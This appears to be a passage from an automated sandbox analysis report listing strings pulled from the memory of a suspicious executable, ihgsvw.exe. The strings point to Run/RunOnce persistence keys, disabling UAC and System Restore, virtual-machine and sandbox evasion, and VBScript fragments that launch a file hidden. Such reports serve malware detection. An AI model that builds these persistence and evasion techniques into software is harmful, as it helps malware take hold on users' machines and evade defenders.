      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\rungz`
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkey_current_user\software\microsoft\windows\currentversion\run
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu64\software\microsoft\windows\currentversion\run
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: disablesysrestore
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ef3bc2b069
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fe7fde
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9f80cd4977c777331a38bd69y
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353$y-
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: runonceoyh
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: arrayslistjys
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startup
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9eb36c2ab69
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9f80cd4977c777331a38bd6
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scriptdir7x0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkey_current_user\software\microsoft\windows\currentversion\runrx[
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: loop}xf
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: deadline
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mainpe
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ef20f3a16f5a7d218d90e33b7c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9dc2be6ac6f6d73369f:g
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hklm64\software\microsoft\windows nt\currentversion\spp\clients%g.
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scriptdir@gi
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: disableuac
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: exe_c5
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (8xmn
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: reg_szn
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 88mn
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6r2f:
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @h5f=
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @h!f)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3c$f,
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @a]f%
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3cpfx
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: htvf^
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hulft
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: le6(txf@
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \(8hln
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8hln
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: reg_sz
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (ehnn
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h6kes
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \(8xmn
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: haei
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (exnn
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h2}ee
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: it8nn
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6eem
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8hln
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (8hln
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3$%d-
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a"xd
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @?cdk
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $88on
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @fyda
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \g$hon
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0x35rdz
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @x(on
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3agdo
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \0x385
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g$hmn
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 672c:
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m;5c=
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hd.c6
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2%sc[
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3=vc^
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mwicq
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h qcy
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 67a=
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: reg_szkaq
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @laaw
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g~gam
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @bza@
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @?paf
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6oau
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vbldr
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6$)`?
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g+c`i
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @mf`l
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3oy`o
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6v|`b
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3,r`x
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @}u`{
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \inik
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: legt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \ini_
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: reg_sz]o#
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h!4n:
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @m7n=
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @w-n3
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6\n"
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: reg_szun[
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user~1\appdata\local\temp\folder10_51\ihgsvw.exe
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\temp\folder10_51\cdjr.ktl'm,
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\temp\folder10_51\cdjr.ktlwm|
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\c:\users\user~1\appdata\local\temp\folder~1\cdjr.ktl
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user~1\appdata\local\temp\folder10_51\update.vbswl\
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: const waitonreturn = true
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353version\runonc
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wshshell.run file, hidden, waitonreturn
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: set wshshell = createobject("wscript.shell")0j
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353/j2
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353^j!
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6mjp
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6|jo
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6soft\windows\currentvekj~
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2df5a1406c4b
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6\currentversion\polici
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353i
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd3ae6ba446d62679f?i
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0ab698fb3f7c.i1
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353]i
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2df5a1406c4bli_
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ef3bf3a765687634b29cd6{in
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2df5a1406c4bji}
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0ab698fb3f7cm
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9d82cf4917h
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: anti_botkillrh
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6}h
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hklm64\software\microsoft\windows\currentversion\policies\system
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwaretray.exe
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd3ae6ba446d62649f
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9d82cf491
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxservice.exe:
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ef3bc2b069%
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu64\software\microsoft\windows\currentversion\runonce@
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program managerk
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cc2ff391
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd26e8ba4441
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vbox.exeists
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: anti_sandbox_vm(
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9dc2be6ac6f6d73369fs
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d:\espacefree~
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d:\espacefree
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd3ae6ba446d62679f
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cc2ff391;
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0ab698fb3f7c&
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0ab698fb3f7ca
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxtray.exel
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: emulator
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cf20f3a14479613e9f
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: antitask
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu64\software\microsoft\windows\currentversion\policies\system
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: key3857
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \cu6(\k
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: enxbt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ehgt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $6mhbt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0xm{5m
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @b(at
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6q(at
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: htxat
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0x6x5
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0x6d5
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ehbt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mk8et
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: crlf;
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: file ="4
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \0x385*
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +sh2zk
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m:xet
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3<xet
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @shft
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $m4(et
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $8xft
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $e(et
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (8het
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0x3 5
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: exe_c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: disabl
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8het
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 88gt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cd g$b
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0xmk5~
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6(xht
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ta3%.
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: start
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a&(ht
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (8xgt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: disablt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @echo off
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \mshta.exe<
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: variables3
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: variablesnaryx
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: variablescd23e39753777_
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: variablesciiarray9767m
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \start.cmdd
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \start.cmd720f4bc51747{
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9f82ff591rosor
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \run.vbs9c720ee97637d6i
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \run.vbsg
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wscript.shell
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startupdir720f4bc51747
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wshshell.run= wscript.
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wscript.quit
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: variablescd21f2a6447d6
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: reg_dword
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scriptdirrtnamec59767
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: etaskmgr9fd2df5a1406c4
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: byte[uctcreate
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ef3bc2b06967
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: etaskmgr
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: const hidden = 01406c4
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: start.lnk
